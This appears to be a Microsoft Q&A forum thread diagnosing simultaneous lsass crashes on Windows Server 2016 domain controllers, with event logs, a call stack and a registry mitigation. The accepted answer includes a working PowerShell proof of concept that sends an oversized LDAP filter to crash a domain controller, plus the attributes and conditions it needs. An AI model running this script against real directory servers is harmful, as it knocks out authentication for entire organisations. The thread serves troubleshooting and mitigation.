lsass crashes on windows 2016

keymax147 21 Reputation points
2022-08-15T16:15:50.993+00:00

Hi All!

Last days we faced the problem with our DС controllers.
Synopsis:
Within 4 minutes 9 DC controllers went down with same error: lsass faulted in ntdsai.dll 0xc00000fd

og Name: Application
Source: Application Error
Date: xxxxxxxxx
Event ID: 1000
Task Category: Application Crashing Events
Level: Error
Keywords: Classic
User: N/A
Computer: computer1
Description:
Faulting application name: lsass.exe, version: 10.0.14393.4704, time stamp: 0x615be0cd
Faulting module name: ntdsai.dll, version: 10.0.14393.4946, time stamp: 0x61f82f6c
Exception code: 0xc00000fd
Fault offset: 0x000000000011b537
Faulting process id: 0x368
Faulting application start time: 0x01d846d02ab1ed09
Faulting application path: C:\Windows\system32\lsass.exe
Faulting module path: C:\Windows\system32\ntdsai.dll
Report Id: 191428d8-85b7-4537-b82d-38d76e90a3a8
Faulting package full name:
Faulting package-relative application ID:
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Application Error" />
<EventID Qualifiers="0">1000</EventID>
<Level>2</Level>
<Task>100</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="xxxxxxxxxxxxxx" />
<EventRecordID>409660</EventRecordID>
<Channel>Application</Channel>
<Computer> computer1</Computer>
<Security />
</System>
<EventData>
<Data>lsass.exe</Data>
<Data>10.0.14393.4704</Data>
<Data>615be0cd</Data>
<Data>ntdsai.dll</Data>
<Data>10.0.14393.4946</Data>
<Data>61f82f6c</Data>
<Data>c00000fd</Data>
<Data>000000000011b537</Data>
<Data>368</Data>
<Data>01d846d02ab1ed09</Data>
<Data>C:\Windows\system32\lsass.exe</Data>
<Data>C:\Windows\system32\ntdsai.dll</Data>
<Data>191428d8-85b7-4537-b82d-38d76e90a3a8</Data>
<Data>
</Data>
<Data>
</Data>
</EventData>
</Event>

Such fault lead to reboot of every server.
These servers are on 6 baremetal servers and 3 on VMs. All VMs are on different VMware clusters. VMs servers managed to reboot 2-3 times within this period of time.
Each metal and VM server has 128 Gb of memory (utilized not more than 35%), 20 CPU cores (utilized not more than 40%). Disks' latency, queues etc are in normal condition.
These servers are also splitted between different datacenters (4 in one datacenter and 5 in the other)
All servers have lsass version 10.0.14393.4704 and ntdsai.dll is of version 10.0.14393.4946.
The only factor that joins all these servers is that they are published in one NS record in DNS.
We have traced the lsass
Callstack lsass.exe:

Child-SP RetAddr Call Site

00 000001b020b7c578 00007fff896df73f ntdsai!_chkstk+0x37
01 000001b020b7c590 00007fff896df6ac ntdsai!StrCatBufferLen+0x87
02 000001b020b7c5f0 00007fff897b4f56 ntdsai!StrCatBuffer+0x1c
03 000001b020b7c620 00007fff896df08a ntdsai!ValueCatBuffer+0x12a
04 000001b020b7c700 00007fff896df1cf ntdsai!dbCreateSearchPerfLogFilterInt+0x1a6
05 000001b020b7c7a0 00007fff896df1cf ntdsai!dbCreateSearchPerfLogFilterInt+0x2eb
06 000001b020b7c840 00007fff896dea5b ntdsai!dbCreateSearchPerfLogFilterInt+0x2eb
07 000001b020b7c8e0 00007fff8986804f ntdsai!DBCreateSearchPerfLogData+0x7b
08 000001b020b7c9c0 00007fff8967737c ntdsai!DBGenerateLogOfSearchOperation+0x47
09 000001b020b7ca20 00007fff89674613 ntdsai!FindFirstSearchObject+0x40c
0a 000001b020b7cb50 00007fff89676348 ntdsai!LocalSearch+0x1483
0b 000001b020b7d970 00007fff8967c49d ntdsai!SearchBody+0x98
0c 000001b020b7d9b0 00007fff896c0319 ntdsai!DirSearchNative+0x125
0d 000001b020b7dce0 00007fff896bad27 ntdsai!LDAP_CONN::SearchRequest+0xbe9
0e 000001b020b7e340 00007fff896bca53 ntdsai!LDAP_CONN::ProcessRequestEx+0x1ca7
0f 000001b020b7f100 00007fff896b8d1e ntdsai!LDAP_CONN::IoCompletion+0x8f3
10 000001b020b7f910 00007fff89a825c9 ntdsai!LdapCompletionRoutine+0x14e
11 000001b020b7f980 00007fff89a822e4 ntdsatq!AtqpProcessContext+0xd9
12 000001b020b7f9e0 00007fff8e0b84d4 ntdsatq!AtqPoolThread+0x194
13 000001b020b7fa70 00007fff8e4e1791 kernel32!BaseThreadInitThunk+0x14
14 000001b020b7faa0 0000000000000000 ntdll!RtlUserThreadStart+0x21

231183-photo-2022-08-15-184135.jpeg

231184-photo-2022-08-15-184442.jpeg

231198-photo-2022-08-15-190741.jpeg

From our point of view the following key functions are:
LDAP_Conn Search Request and DBGenerateLogOfSearchOperation.

By the way these DC controllers have Field Engineering Diagnostic Logging to monitor slow LDAP requests via the registry value HKLM/system/currentcontrolset/services/ntds/diagnostics - set the param 15 to 0x00000005

We also see that _chkstk tried to allocate 2601872 bytes of memory but PE headers of lsass.exe shows it has limitation for 512 Kbytes of memory. So it looks that _chkstk may have some bug. But this is still unclear as we are not the developers of Windows OS.
So as the bottom line we think that LSASS has crashed somewhere between logging of some event in DBGenerateLogOfSearchOperation which is directly linked to LDAP_Conn Search Request

Questions and comments are highly welcomed as we are still not sure about future reliability of this domain. Has anyone met same problem? We haven't managed to find any similar problem or bug via google.

By the way we have examined the possibility of malicious activity as well.
Found two vulnerabilities https://www.rapid7.com/db/vulnerabilities/msft-cve-2022-26831/ and https://nvd.nist.gov/vuln/detail/CVE-2022-26919
Both of them are closed in the end of April 2022.

Windows Server
Windows Server
A family of Microsoft server operating systems that support enterprise-level management, data storage, applications, and communications.
12,058 questions
Windows Server Security
Windows Server Security
Windows Server: A family of Microsoft server operating systems that support enterprise-level management, data storage, applications, and communications.Security: The precautions taken to guard against crime, attack, sabotage, espionage, or another threat.
1,714 questions
Windows 11
Windows 11
A Microsoft operating system designed for productivity, creativity, and ease of use.
8,076 questions
0 comments No comments
{count} votes

Accepted answer
  1. Elvis P 96 Reputation points
    2022-09-19T21:15:52.487+00:00

    tag @keymax147

    Hi KeyMax147-9529,

    It sounds like it could be related to the issue. However, MS says it's not. They won't confirm if it even has a CVE.

    Setting "15 Field Engineering" to 0 stops the problem but does leave you without 1644 events. If you are a large organization, this sucks. If you want to test in your own lab, here you go. It's pretty simple once you know the problem. Don't use this script for evil unless someone really deserves it ;)

    $lDAPServer = "myservername.mydomain.tld:3268"
    $attribute = "legacyExchangeDN"

    $padding = "Nullam non nisi est sit amet."
    $lDAPSearchClause = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua."
    $strBuilder = [System.Text.StringBuilder]::new()
    # 2016 itterations + padding.
    for($i=0;$i -lt 2016 ;$i++){
    [void]$strBuilder.Append($($lDAPSearchClause))
    }
    $lDAPFilter = $("({0}={1}{2})" -f $attribute,$padding,$strBuilder.ToString())

    Write-Host $attribute -ForegroundColor Yellow
    Write-Host $("Will Crash at ~ 247,883. Filter Length: {0}" -f ([System.Text.Encoding]::UTF8.GetByteCount($lDAPFilter))) -ForegroundColor Green
    Get-ADObject -Server $lDAPServer -LDAPFilter $lDAPFilter -SearchBase "" -SearchScope Subtree -Properties samaccountname

    <#
    Note: IF you have not been running "15 Field Engineering" at 5 or have set back to 0 to prevent denial of service,
    it may take some time for your DC to get into a state where this occurs. THe above script should work right away.
    Change the string builder iterations from 2016 to make the filter larger or smaller.

    Additional testing: loop through confirmed attribute list below and/or wrap the entire script in it's own 500 count for loop.

    Affects attributes with:

    oMSyntax 20 and 127
    attributeSyntax 2.5.5.4 and 2.5.5.1

    attribute must also be published in GC:
    (isMemberOfPartialAttributeSet=TRUE)

    Confirmed attributes:

    legacyExchangeDN
    mSSMSCapabilities
    mSMQLabel
    member
    objectCategory

    >

    1 person found this answer helpful.

6 additional answers

Sort by: Most helpful
  1. Elvis P 96 Reputation points
    2022-08-26T01:54:19.77+00:00

    Set 15 Field Engineering in the registry from 5 to 0. This is an undisclosed bug that is actually reproducible with a domain user account and 13 lines of powershell.

    HKLM\System\CurrentControlSet\Services\NTDS\Diagnostics\15 Field Engineering

    1 person found this answer helpful.

  2. Elvis P 96 Reputation points
    2022-08-30T05:30:42.663+00:00

    Tag @Skycat

    MS started taking our case more seriously when I was able to reproduce on demand with a very short and simple PowerShell. They are actively working on a hot fix.

    I don't want to disclose to much at this time as it can easily be used as a denial of service. I responded to this so anyone encountering this issue can stop it and get MS to acknowledge the issue. I don't think this issue has been published widely internally at MS.

    With that said, it is an LDAP search processing failure with the filter driver used in 15 field Engineering when it is set to 5. This the bit that logs 1644 events. This is also why the offending query is not logged in directory services. The dump trace shows ntdsai.dll faulting with an LDAP OPERATIONS ERROR. This should be passed back to the client. Unfortunately the 15 Field Engineering hook is passing faulty address info causing lsass to crash. This is why you see lsass mostly throwing a 0xc0000005 (memory access fail) and the faulting module is ntdsai.dll. The ntdsa and ntdsai dlls are the DSA (directory service agent).

    Based on my testing. The following are criteria for the problem to manifest on a 2016,2019 an likely 2022 DC.

    1. 15 Field Engineering must be set to 5 (set to 0 for mitigation).
    2. A particular format used in an LDAP filter.
    3. Applies to one level or subtree search only. Base searches are not affected.
    4. Works against full directory or global catalog.
    5. Based on my testing, the filter must be against an attribute of OmSyntax 20 or 127 and the attribute has to be published 8n the GC.
    1 person found this answer helpful.

  3. Elvis P 96 Reputation points
    2022-08-31T13:40:20.027+00:00

    tag @keymax147

    Hi KeyMax147-9529,

    Error 0xc0000005 was the most common that I saw when reviewing logs. I did see a few one-off errors. Error 0xc00000fd is a stack overflow, https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-a-stack-overflow. I could see this problem causing a stack overflow. The common thread is lsass crashing with ntdsai module being the faulting module.

    I don't want to release the code publicly right now since MS quit jerking us around and is actively working on a hotfix. To my knowledge, I am the only one to have reproduced the problem. I wouldn't want the script getting around. It would be like signing my name to it. I did tell MS and my employer that I would release if it MS starts jerking us around again.

    I more or less responded to this thread so you and others would have a fix if impacted by this. People are being impacted. I know of someone who have had more than a score of DCs go down at once.

    I will eventually publish the script here.

    1 person found this answer helpful.

  4. Gary Reynolds 9,391 Reputation points
    2022-08-15T17:58:06.397+00:00

    Hi,

    I'm not sure I have much to add and you might need to log a call with Microsoft but a couple of questions.

    Are all the DCs the same OS version?
    What patches have been installed in the last few days?
    What If you build new DCs with the same and different OS version do they have the same problem?
    Have you run a semantic database check?
    Does dcdiag and repadmin show any error?

    Gary.